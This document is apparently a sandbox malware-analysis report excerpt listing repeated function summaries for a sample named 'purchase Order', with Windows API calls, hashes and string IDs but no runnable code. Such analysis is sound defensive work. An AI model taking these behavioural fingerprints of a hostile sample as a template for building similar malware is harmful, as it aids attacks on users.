                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        • Opcode ID: acdef80bf655af7f9f16c5bed6f3a87bedaf3db1c8fdaa7b6be8c9e41d044b9f
                                                        • Instruction ID: 3feb6bcffb92fb9dcaf0b96002169575a9020159442ee0f87300b5b683d96ff1
                                                        • Opcode Fuzzy Hash: acdef80bf655af7f9f16c5bed6f3a87bedaf3db1c8fdaa7b6be8c9e41d044b9f
                                                        • Instruction Fuzzy Hash: FC112F76D00B14EBDB20EB98C840B9D77B8AB05398F040021E826E72A0D7F0EF04CBA5
                                                        APIs
                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C94DF5
                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C94E1E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Internet$OpenOption
                                                        • String ID: <local>
                                                        • API String ID: 942729171-4266983199
                                                        • Opcode ID: 943b9f721eb28465c81c977e9aa4a1e57a62212619f4e30bf04b76f7c04a3184
                                                        • Instruction ID: 3335daaf7aba958f807eca4824b7616944d33587afa21f7d22879c1dbeb1929e
                                                        • Opcode Fuzzy Hash: 943b9f721eb28465c81c977e9aa4a1e57a62212619f4e30bf04b76f7c04a3184
                                                        • Instruction Fuzzy Hash: EC119A75501221BBDF298B62C88CFFBFAA8FB06755F10822AF52596140D3709A52C6E0
                                                        APIs
                                                        • SendMessageW.USER32(?,?,?,?), ref: 00CAB22B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 3850602802-2594219639
                                                        • Opcode ID: f0353b79f65bd6d74f9d17c63b527888fe2b71a8536bcde101f9e97b65f4d22f
                                                        • Instruction ID: 4cac14e0079c21c8bd2628022a8f3ec558f3f1b64c7b71e9722c6b51b9f83b43
                                                        • Opcode Fuzzy Hash: f0353b79f65bd6d74f9d17c63b527888fe2b71a8536bcde101f9e97b65f4d22f
                                                        • Instruction Fuzzy Hash: 3D21C07960020AEFCB15DF98C850AAE7BB9FB4E344B004655F916A3361D731AE61DBA0
                                                        APIs
                                                        • SendMessageW.USER32(?,00000401,?,00000000), ref: 00CA9327
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u$button
                                                        • API String ID: 3850602802-1762282863
                                                        • Opcode ID: 8dd31e5f81938de00f2b5628ad07ce2c821242663a4e77abb667d674efaec4b0
                                                        • Instruction ID: 3612638ca05567f1d1a775427498268ee90b1a6fcde44b9f3b9d21b195ea7d35
                                                        • Opcode Fuzzy Hash: 8dd31e5f81938de00f2b5628ad07ce2c821242663a4e77abb667d674efaec4b0
                                                        • Instruction Fuzzy Hash: 3511E13215020ABBDF118F64CC02FEA3B7AFF09318F150214FA65A71E0C372E861AB60
                                                        APIs
                                                        • SendMessageW.USER32(?,0000133E,00000000,?), ref: 00CAA5D3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 3850602802-2594219639
                                                        • Opcode ID: 58aea3120a1dd43a0faf01455d93e8da817a1ae18b09c892d66f0d3a796d7afb
                                                        • Instruction ID: 300898036448377a5f6e2873a6e3e3e9a0330e927ef15fb8d1922917e5f173f0
                                                        • Opcode Fuzzy Hash: 58aea3120a1dd43a0faf01455d93e8da817a1ae18b09c892d66f0d3a796d7afb
                                                        • Instruction Fuzzy Hash: BE11A930500745AFDB20CF24C8A1AEABBE8BF06318F14891DE9AB87291DB716941DB60
                                                        APIs
                                                        • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00C9A84E
                                                        • htons.WSOCK32(00000000,?,00000000), ref: 00C9A88B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: htonsinet_addr
                                                        • String ID: 255.255.255.255
                                                        • API String ID: 3832099526-2422070025
                                                        • Opcode ID: f10438c2796951adb4eaec494aaef9c67aa0ecc33499fe7f7d5b4e4c6d9487af
                                                        • Instruction ID: 0e62dcc4cec65f5f000a762a153366bcd043a5816106eb1160626cdf40f33464
                                                        • Opcode Fuzzy Hash: f10438c2796951adb4eaec494aaef9c67aa0ecc33499fe7f7d5b4e4c6d9487af
                                                        • Instruction Fuzzy Hash: 7501D275200305ABCF11AF68C88AFADB364FF44714F10846AF5269B3D1D771E801979A
                                                        APIs
                                                          • Part of subcall function 00C5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00C5B35F
                                                        • DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,00CBE44F,?,?,?), ref: 00CAF344
                                                          • Part of subcall function 00C5B526: GetWindowLongW.USER32(?,000000EB), ref: 00C5B537
                                                        • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00CAF32A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$MessageProcSend
                                                        • String ID: @U=u
                                                        • API String ID: 982171247-2594219639
                                                        • Opcode ID: 1c2e053fc5ccf70097ea65b188dd8cb1f620519427fb3829543aee5b7a49b83d
                                                        • Instruction ID: ed187e5cd0ce9c047985cf6a4802e2db3f9b565122638cfbc0d46412ab6bed6f
                                                        • Opcode Fuzzy Hash: 1c2e053fc5ccf70097ea65b188dd8cb1f620519427fb3829543aee5b7a49b83d
                                                        • Instruction Fuzzy Hash: 7001D435201204AFCF219F54DC48F6A7B66FB8632AF184628F8561B2F0C772AC47DB60
                                                        APIs
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C7C66D
                                                        • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00C7C69D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 3850602802-2594219639
                                                        • Opcode ID: ca48b5bb0b2cfae0ca87be7572cbd08765ced56924f476e4dd5a5a2af521d9cc
                                                        • Instruction ID: 69b3ab703a3cab68c056f69c03be78b85a40f8a034bf74cc598dcbba25f18fdb
                                                        • Opcode Fuzzy Hash: ca48b5bb0b2cfae0ca87be7572cbd08765ced56924f476e4dd5a5a2af521d9cc
                                                        • Instruction Fuzzy Hash: 19F0A071280308BBEB116E90ECC6FBA7B28FB04791F108429F74A1A1D0CAE25D11A760
                                                        APIs
                                                          • Part of subcall function 00C7C2DE: SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00C7C2F7
                                                          • Part of subcall function 00C7C2DE: SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C7C331
                                                        • SendMessageW.USER32(?,0000110B,00000005,00000000), ref: 00C7C7FC
                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C7C80C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 3850602802-2594219639
                                                        • Opcode ID: c3ca550179741d7945908cd8cd8f1ed298fa3e81ea917a2682cf8d132a17665c
                                                        • Instruction ID: eea369dd6730cd880964bd651dc5cd206c9599e5a70fb79445f888748be10789
                                                        • Opcode Fuzzy Hash: c3ca550179741d7945908cd8cd8f1ed298fa3e81ea917a2682cf8d132a17665c
                                                        • Instruction Fuzzy Hash: B2E0D87524430A7FF7151A61DC8BFA73B6CEB48751F11843DF70455091EEA38C11A520
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ClassName_wcscmp
                                                        • String ID: #32770
                                                        • API String ID: 2292705959-463685578
                                                        • Opcode ID: 6bc83b2c771fe7a697f258a400b807a6fb7266011760469e377768c83d433c33
                                                        • Instruction ID: 3b9d94e6d6590a71bb7a048eb879fce818891a90d670cf5221dc24a3c08f20ca
                                                        • Opcode Fuzzy Hash: 6bc83b2c771fe7a697f258a400b807a6fb7266011760469e377768c83d433c33
                                                        • Instruction Fuzzy Hash: 8BE0927760432867D720EAA5DC49F9BFBACAB51764F04012AF915D3141E670E601C7E4
                                                        APIs
                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C7A63F
                                                          • Part of subcall function 00C613F1: _doexit.LIBCMT ref: 00C613FB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Message_doexit
                                                        • String ID: AutoIt$Error allocating memory.
                                                        • API String ID: 1993061046-4017498283
                                                        • Opcode ID: b011443d03151f0bf8e7d429a18ed23b55a5a72b1b0436240b942520e8460ee0
                                                        • Instruction ID: 7fc8241ce6ad5aa5ef2757951a232d62672dae290487903d3206f32c0d917757
                                                        • Opcode Fuzzy Hash: b011443d03151f0bf8e7d429a18ed23b55a5a72b1b0436240b942520e8460ee0
                                                        • Instruction Fuzzy Hash: 1FD02B323C031833C32436A86C07FCC354C8B04B52F080036FF0D955D349D38A8051DA
                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 00CBACC0
                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00CBAEBD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: DirectoryFreeLibrarySystem
                                                        • String ID: WIN_XPe
                                                        • API String ID: 510247158-3257408948
                                                        • Opcode ID: c00296ef8fd53a9ab4fc1b3da14acd60ab72fac4272a79d955d9aa4738a1fb79
                                                        • Instruction ID: fcb9479196ec4bb68b7de71ef354fec7b86636925ff7a10bcb7b49d1bf53dde0
                                                        • Opcode Fuzzy Hash: c00296ef8fd53a9ab4fc1b3da14acd60ab72fac4272a79d955d9aa4738a1fb79
                                                        • Instruction Fuzzy Hash: 7BE0C970C00659AFCB11DBA9D948AECFBB8AB58301F148096E192B2660DB715A84DF66
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CA86E2
                                                        • PostMessageW.USER32(00000000), ref: 00CA86E9
                                                          • Part of subcall function 00C87A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00C87AD0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: 63ec04863406477db128aed8f8ae397ef2b07908facc43582ac2f57545f1dbc7
                                                        • Instruction ID: f554b3d8fcfebdeaa1c0fb81f7d6d7b2fb251859e8ff13360e2a048d46799e38
                                                        • Opcode Fuzzy Hash: 63ec04863406477db128aed8f8ae397ef2b07908facc43582ac2f57545f1dbc7
                                                        • Instruction Fuzzy Hash: D3D012717853587BF2687770EC4BFCABA189B48B11F110925F746EA1D0C9F0E940C759
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CA86A2
                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00CA86B5
                                                          • Part of subcall function 00C87A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00C87AD0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: f90ee39a673db1c4cf04655ea500657b24df162150ee1dfca5f4dc9df87fed3d
                                                        • Instruction ID: 65799906c7da3e2b2da9b4aef73db169952d0336ef2129ccbab22c53c223e855
                                                        • Opcode Fuzzy Hash: f90ee39a673db1c4cf04655ea500657b24df162150ee1dfca5f4dc9df87fed3d
                                                        • Instruction Fuzzy Hash: 46D01271788358B7E2687770EC4BFDABA189B44B11F110925F74AAA1D0C9F0E940C754
                                                        APIs
                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C7BD55
                                                        • SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 00C7BD63
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 3850602802-2594219639
                                                        • Opcode ID: 8a8c31eab103600959a8d281e2c7ca8b6ee49f80b9f43cadf68f6b8924e381ab
                                                        • Instruction ID: 301153829b9682b8c8fc6aa7772e9b75aaf6cf43cb83365a7fc634189708d4aa
                                                        • Opcode Fuzzy Hash: 8a8c31eab103600959a8d281e2c7ca8b6ee49f80b9f43cadf68f6b8924e381ab
                                                        • Instruction Fuzzy Hash: 6BC00271140584BAE7211B77EC0DE4B3E3DF7CAF51715056CB256950A586660056D634